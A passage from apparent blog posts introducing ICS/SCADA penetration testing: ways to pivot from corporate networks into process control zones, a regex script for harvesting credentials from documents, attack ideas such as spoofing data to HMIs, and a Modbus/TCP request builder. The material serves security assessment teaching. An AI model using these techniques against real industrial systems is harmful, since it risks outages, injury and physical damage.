  • Corporate Network Domain is Extended into Process Control Network – In cases where there are dual-homed hosts or workstations with VPN access on the corporate network, it is fairly common for these hosts to be joined to the corporate network’s Active Directory domain. Because of this, it is often possible to access these hosts directly using highly-privileged Active Directory accounts from the corporate network, such as Domain Administrators. More security-minded organizations may have taken the extra step of limiting access to these hosts to only specific users or groups. However, having compromised the corporate network, it is a relatively simple task to locate users of interest on the corporate network and extract their passwords from memory.
  • Exposed Vulnerable Services – Entry-points can often have additional services such as databases or web applications that can be vulnerable to common attacks. Any hosts with access to the process control network should be scanned thoroughly to identify exposed services. These services should then be probed to find new vulnerabilities or researched to find publicly-available vulnerabilities or common misconfigurations that could lead to compromising the host.
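Searching the gathered documentation for plaintext credentials can likewise be automated with simple patterns. A rough heuristic sketch, assuming document text has already been extracted; the key/value patterns are illustrative, not exhaustive:

```python
import re

# Naive "key: value" patterns for credential strings in documentation.
# Real documents vary widely, so treat this as a first-pass heuristic.
CRED_PATTERNS = [
    re.compile(r"(?:username|user|login)\s*[:=]\s*(\S+)", re.IGNORECASE),
    re.compile(r"(?:password|pass|pwd)\s*[:=]\s*(\S+)", re.IGNORECASE),
]

def extract_credentials(text):
    """Pull likely credential strings out of extracted document text."""
    found = []
    for pattern in CRED_PATTERNS:
        found.extend(pattern.findall(text))
    return found
```

Hits should be tried against the entry points identified earlier, keeping the lax lockout policies described above in mind.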

Easy Wins/Should Not Ever Happen

If you are ever conducting a pentest against ICS infrastructure, the following are findings that should immediately be written up as critical:

  • Modbus/DNP3 traffic on corporate network
  • HMIs accessible from the corporate network with more than read-only access
  • NMAPing a nuclear reactor causes a meltdown.

Hopefully, that last scenario NEVER happens, but if it does, write it up and move on.


Despite the fact that the world around us depends upon ICS technologies, a large knowledge gap remains in both the public and the information security community when it comes to interacting with and securing them. It is our hope that these blog posts have proved insightful and can help move the conversation forward.


Introduction to Attacking ICS/SCADA Systems for Penetration Testers

Since coming into use in the late 1960s, Industrial Control Systems (ICSs) have become prevalent throughout all areas of industry and modern life. Whether in utilities, energy, manufacturing or a myriad of other applications, industrial control systems govern much of our lives.

From the invention of the Modular Digital Controller in 1968 until the mid-1990s, ICS networks were almost always isolated, operating with very limited input or output from outside sources. With the rise of cheap hardware, Microsoft Windows, Active Directory and standardization, corporate networks now receive and process data, as well as fine-tune operations, from networks outside of the traditional ICS network. While significant effort is being made in modern environments to ensure segmentation between IT (information technology) and OT (operational technology) networks, the blurring of the lines between the two has resulted in a security headache for many industries.


While the terms Industrial Control Systems and Supervisory Control And Data Acquisition (SCADA) are often used interchangeably, an important distinction between the two exists: ICS is the name given to the broader category of technology, whereas SCADA is a subcategory of ICS. Examples of ICS subcategories include:

Distributed Control Systems (DCS)

  • Offers real-time monitoring and control over processes.
  • Typically, the components are located within a small geographic area, such as an oil refinery, coal plant, or hydroelectric dam. DCS are usually contained within the four walls of a building.

Programmable Logic Controllers (PLC)

  • Typically, ruggedized computers that are the brains of smaller moving parts in a given process control system.

Supervisory Control And Data Acquisition (SCADA)

  • Acts as a manager of sorts.
  • Supervisory servers do not typically make decisions.
  • Supervisory servers typically relay commands from other systems or human operators.

Historian

  • Collect and store data regarding process statistics, sensor readings, inputs/outputs and other measures.
  • May be required for regulatory purposes.
  • Typically data is stored in a database such as MSSQL or Oracle.

Human Machine Interface (HMI)

  • HMIs are ‘pretty pictures’ that allow a process engineer to monitor an entire ICS at a glance.
  • They usually feature graphics of various pumps, relays and data flows.

Remote Terminal Unit (RTU)

  • Small, ruggedized computers that collect and correlate data between physical sensors and ICS processes.

Adding additional complexity to ICS environments are the many different communications protocols in use. Examples of both common and proprietary protocols implemented in ICS environments include:

  • ANSI X3.28
  • BBC 7200
  • CDC Types 1 and 2
  • Conitel 2020/2000/3000
  • DCP 1
  • DNP3
  • Gedac 7020
  • ICCP
  • Landis & Gyr 8979
  • Modbus
  • OPC
  • ControlNet
  • DeviceNet
  • DH+
  • ProfiBus
  • Tejas 3 and 5
  • TRW 9550

Typical ICS architecture

When designing ICS environments, high availability, regulatory requirements and patching challenges can significantly constrain design choices. In order to fit within these restrictions, most ICS environments tend to follow a three-tiered structure:


At the uppermost level, the HMIs and SCADA servers oversee and direct the lower levels, either based upon a set of inputs or a human operator. Typically data from the SCADA servers is gathered by the HMI, then displayed to engineering workstations for ICS engineers’ consumption.


The middle layer typically collects and processes inputs and outputs passed between the layers. The devices operating at this layer, known as Field Controllers, include programmable logic controllers (PLCs), intelligent electronic devices (IEDs) and remote terminal units (RTUs). Field Controllers can coordinate lower level actions based upon upper level directions, or send process data and statistics about the lower level to the upper level.


At the lowest level, devices known as Field Devices are responsible for the moving parts and sensors directing the movement of pumps, robotic arms and other process-related machinery. Additionally, they typically include various sensors to monitor processes and pass data along to the middle layer (i.e. Field Controllers) for data processing.

Communication links between the layers are often required in ICS environments and this communication typically utilizes different protocols. Communication between the SCADA server located in the upper layer and Field Controllers in the middle layer typically utilize common protocols such as DNP3 or Modbus. For communication between Field Controllers and lower level Field Devices, commonly used protocols include HART, Foundation Fieldbus and ProfiBus.

Although designing networks that meet the ICS requirements can be challenging, organizations with ICS typically achieve this by having three zones in their infrastructure:

Enterprise Zones contain the typical corporate enterprise network. In this network are standard corporate services such as email, file/print, web, ERP, etc. In this zone all of the business servers and employee workstations reside.

The ICS demilitarized zones (DMZs) typically allow indirect access to data generated by the ICS system. These zones typically contain a secondary Historian, as well as some web and terminal applications.

Finally, the Process Control Zones are where the three layers of ICS systems reside. This zone should be inaccessible from the Enterprise Zone and limited to read-only access from the HMIs and SCADA servers.

ICS and Risk

ICS technology was originally designed without consideration of authentication, encryption, anti-malware tools, firewalls or other defense mechanisms. The lack of such considerations influences how these systems are designed and operated. For example, one of the traditional IT risk mitigation strategies is the timely application of security patches to vulnerable systems. While traditional IT systems can absorb downtime, most ICS systems incur significant costs in loss of production preventing them from being patched on a routine basis. Additionally, unlike traditional IT systems, a failed update on an ICS device could have catastrophic consequences such as contaminated food, blackouts, severe injury, or death.

While a determined attacker may gain direct access to the ICS environment via social engineering or physical attacks, it’s more likely they will pivot from the corporate network, leveraging trusted network connections to SCADA servers and HMIs. Even if the attacker doesn’t manage to exfiltrate sensitive data or perform sensitive actions, the fines, investigations and regulatory reprisals generated by a breach of the ICS environment could prove financially catastrophic for organizations. Real-world ICS incidents and attacks, such as Stuxnet, have demonstrated these consequences.

Although attacks like Stuxnet may seem like an easy way to cause mayhem and destruction, several special considerations should be taken into account when attacking ICS:

  • If an attacker can intercept and modify data between Field Devices and Field Controllers, it is possible to feed false data back to HMIs. The HMI will present inaccurate data causing the human operators to make potentially dangerous changes based on this inaccurate data. Proof of a successful man-in-the-middle attack that alters data like this will likely top the list of critical findings.
  • Many Field Controllers require no authentication, allowing commands to be issued by any system on the network. Using tools such as Scapy, an attacker can craft Modbus or DNP3 packets with ease.
  • IT knowledge, when combined with process knowledge, can be leveraged to cause specific kinetic impacts through cyber means; that is the key to the ‘big boom’ Hollywood scenarios. A Proof of Concept attack demonstrating an attack like this will make for a 5-star report.
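Scapy makes this convenient, but the standard library alone is enough to illustrate the point: a Modbus/TCP request is a short binary structure with no authentication field anywhere in it. The sketch below builds a ‘Read Holding Registers’ (function code 0x03) request per the Modbus/TCP framing; delivering it to a listening controller would require nothing more than a TCP connection to port 502:

```python
import struct

def modbus_read_holding_registers(transaction_id, unit_id, start_addr, count):
    """Build a Modbus/TCP 'Read Holding Registers' (0x03) request.

    Frame = MBAP header (transaction id, protocol id 0, remaining byte
    count, unit id) followed by the PDU (function code, start address,
    register count). Note: no credentials appear anywhere in the frame.
    """
    pdu = struct.pack(">BHH", 0x03, start_addr, count)
    mbap = struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id)
    return mbap + pdu

# Example: read 10 holding registers starting at address 0 from unit 1.
packet = modbus_read_holding_registers(1, 1, 0, 10)
```

The entire request is 12 bytes; the absence of any authentication step is exactly why unauthenticated Field Controllers accept commands from any host that can reach them.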

In our next blog post we’ll walk through a typical ICS/SCADA security assessment, including a description of each of the major phases, what to look out for, and common issues and misconfigurations we’ve seen in the field.